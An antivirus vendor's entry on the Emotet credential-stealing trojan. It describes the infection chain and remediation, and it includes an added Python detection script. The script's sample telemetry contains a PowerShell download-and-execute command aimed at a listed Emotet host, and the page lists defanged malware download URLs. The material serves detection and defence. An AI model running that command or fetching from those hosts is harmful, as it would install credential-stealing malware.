General Explanation
Type: Trojan
Degree of destruction: high
Prevalence: low
What is a Trojan?
Trojans are malware that present themselves as legitimate, useful software and behave like it until they are executed, at which point they carry out their real, damaging purpose on the system. They reach the system as software downloaded from the internet, through content embedded in HTML pages, as email attachments, and by similar routes. Unlike computer worms and viruses, Trojans do not replicate themselves; they spread only when a user is tricked into running them.
What is Emotet malware?
Emotet is one of the best-known malware families that steal users' credentials. Its modules cover several tasks, such as harvesting account data saved in the browser and stealing email credentials. Emotet spreads its files through spam emails sent across different networks.
Technical Explanation
Signs of infection
This malware is delivered by emails that carry an infected attachment or a link to one. The file downloaded from such a link is usually a .doc or .js file. The .doc file contains a malicious macro; when the document is opened and the macro is allowed to run, the macro launches a PowerShell process. That PowerShell process then connects to the following links, in turn, to download the malware's executable:
- hxxp://eclatpro.com/tleyLN/
- hxxp://teplokratiya.ru/giG1isC/
- hxxp://xn--k1acdflk8dk.xn--p1ai/DAA4WB/
- hxxp://soo.sg/dbs/media/sJUjDl/
- hxxp://rosehill.hu/ooOCqD/
If the download succeeds, the executable is saved under the %temp% directory and run immediately.
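The delivery chain above (Office document, macro, PowerShell download cradle, executable dropped in %temp% and run) is what a detection engineer would look for in endpoint and proxy telemetry. The following is an added example, not code from the original page or from Padvish: it runs two checks over constructed sample data. The first flags an Office process spawning PowerShell with a URL or download cradle on its command line, and then any executable that PowerShell launches from the user's Temp directory. The second re-fangs the defanged download URLs listed on the page and matches their hostnames against proxy log lines. The process-event field names (ProcessId, ParentProcessId, Image, ParentImage, CommandLine) resemble Sysmon-style process-creation records but are an assumption of this example, and every event and log line below is constructed.

```python
import re
from urllib.parse import urlparse

# Download URLs from the page, kept defanged (hxxp://) and re-fanged only in memory.
EMOTET_DOWNLOAD_URLS = [
    "hxxp://eclatpro.com/tleyLN/",
    "hxxp://teplokratiya.ru/giG1isC/",
    "hxxp://xn--k1acdflk8dk.xn--p1ai/DAA4WB/",
    "hxxp://soo.sg/dbs/media/sJUjDl/",
    "hxxp://rosehill.hu/ooOCqD/",
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
CRADLE_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|net\.webclient|start-process",
                       re.IGNORECASE)
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def refang(url):
    """Turn a defanged hxxp(s):// indicator back into a real scheme for matching."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def ioc_hosts(urls=EMOTET_DOWNLOAD_URLS):
    """Hostnames of the download URLs, lower-cased, for proxy/DNS matching."""
    return {urlparse(refang(u)).hostname.lower() for u in urls}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect_office_cradle(events):
    """Flag Office -> PowerShell download cradles and executables they then launch from %temp%.

    `events` are process-creation records in time order (assumed schema, see lead-in).
    """
    alerts = []
    cradle_pids = set()
    for ev in events:
        parent, image, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
        if parent in OFFICE_PARENTS and image in SHELLS and (URL_RE.search(cmd) or CRADLE_RE.search(cmd)):
            cradle_pids.add(ev["ProcessId"])
            alerts.append({"rule": "office_spawned_powershell_cradle",
                           "pid": ev["ProcessId"], "urls": URL_RE.findall(cmd)})
        elif ev["ParentProcessId"] in cradle_pids and TEMP_DIR_RE.search(ev["Image"]):
            alerts.append({"rule": "temp_executable_launched_by_cradle",
                           "pid": ev["ProcessId"], "image": ev["Image"]})
    return alerts


def match_proxy_log(lines, hosts=None):
    """Return (client, url) pairs whose hostname is one of the Emotet download hosts."""
    hosts = hosts if hosts is not None else ioc_hosts()
    hits = []
    for line in lines:
        m = re.search(r"client=(\S+)\s+url=(\S+)", line)
        if not m:
            continue
        client, url = m.groups()
        if (urlparse(url).hostname or "").lower() in hosts:
            hits.append((client, url))
    return hits


# Constructed sample telemetry: a macro-spawned cradle, the dropped executable, and a benign shell.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentProcessId": 3988,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                    "'http://eclatpro.com/tleyLN/','C:\\Users\\alice\\AppData\\Local\\Temp\\123.exe')\""},
    {"ProcessId": 4188, "ParentProcessId": 4120,
     "Image": r"C:\Users\alice\AppData\Local\Temp\123.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\123.exe"},
    {"ProcessId": 5000, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-Process"},
]

# Constructed proxy log lines in a simple key=value format.
SAMPLE_PROXY_LOG = [
    "2019-03-04T10:21:05Z client=10.0.0.17 url=http://eclatpro.com/tleyLN/ status=200 bytes=245760",
    "2019-03-04T10:21:09Z client=10.0.0.17 url=http://xn--k1acdflk8dk.xn--p1ai/DAA4WB/ status=404 bytes=0",
    "2019-03-04T10:22:41Z client=10.0.0.23 url=https://www.example.com/ status=200 bytes=1024",
]

if __name__ == "__main__":
    for alert in detect_office_cradle(SAMPLE_EVENTS):
        print("ALERT", alert)
    for client, url in match_proxy_log(SAMPLE_PROXY_LOG):
        print("IOC HIT", client, url)
```

The first rule keys on the parent/child relationship rather than on the URL list, because the download hosts change between campaigns while "Word launches PowerShell with a download cradle" does not; the IOC match is the cheap retrospective check to run over proxy and DNS history once the hosts are known.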
Emotet infects a system in three steps:
- It enters the system through an infected email.
- It downloads its executable.
- The executable connects to the attackers' server and downloads the main module.
Once the executable has connected to its server, it sends the server information about the system's running processes, together with data from email-related software such as Microsoft Outlook. When this exchange between the victim's system and the server is complete, the server sends the malicious module to the victim's system, where the executable loads and runs it.
Emotet's modules fall into several categories, including:
- Credential theft
- Spreading the malware by sending spam
- DDoS attacks
- Stealing users' account data from web browsers
- Stealing credentials for email services
How to deal with it and disinfect the system
Padvish Antivirus detects this malware and disinfects the system. To keep this kind of malware out, do not click on suspicious links, scan attachments before opening them, and do not enable macros in documents received by email unless you are sure of their origin. Also keep the antivirus and the operating system up to date.